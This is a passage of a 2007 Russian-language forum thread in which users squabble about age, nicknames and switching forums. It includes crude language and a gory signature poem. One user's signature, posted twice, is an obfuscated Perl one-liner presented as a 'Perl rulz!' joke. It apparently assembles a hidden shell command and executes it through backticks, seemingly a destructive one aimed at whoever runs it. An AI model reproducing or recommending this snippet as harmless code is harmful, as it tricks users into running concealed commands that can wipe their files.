Добавлено: Ср Июл 04, 2007 12:51 am Заголовок сообщения:
Lobzik
он обдумывал каждое слово, чтобы не ударить в лп лицом _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Ср Июл 04, 2007 1:01 am Заголовок сообщения:
блин мне подумалось, жаль что мой братишка мой ник знает, так можно было бы над ним постебатсо, ему показать тоже как тут лп обсирают и постебать слегка))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Ср Июл 04, 2007 1:34 am Заголовок сообщения:
Да ладно вам!Как я подозреваю-мы тут все не особо взрослые.С другой стороны-плевать на возраст,главное,чтоб человек хороший был.и напоследок
Gosha-smart писал(а):
Пойду к своим на форум!
по человеку судят по делам,а не по словам(мы ждём) _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Ср Июл 04, 2007 1:37 am Заголовок сообщения:
1-Мне 18. 2- Миша и Ас-Т почитайте выше посты, я писал что ухожу к своим, я сходил попостил там и вернулся! Вы что слепые? _________________ Пошли все на Хуй!
Добавлено: Ср Июл 04, 2007 1:43 am Заголовок сообщения:
1-18,согласись,не так уж и много (хотя,всё в жизни относительно).
2-Моё имя Егор.То что Мишка-моё имя-распростронённое заблуждение.На самом деле Мишка-моя кличка. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.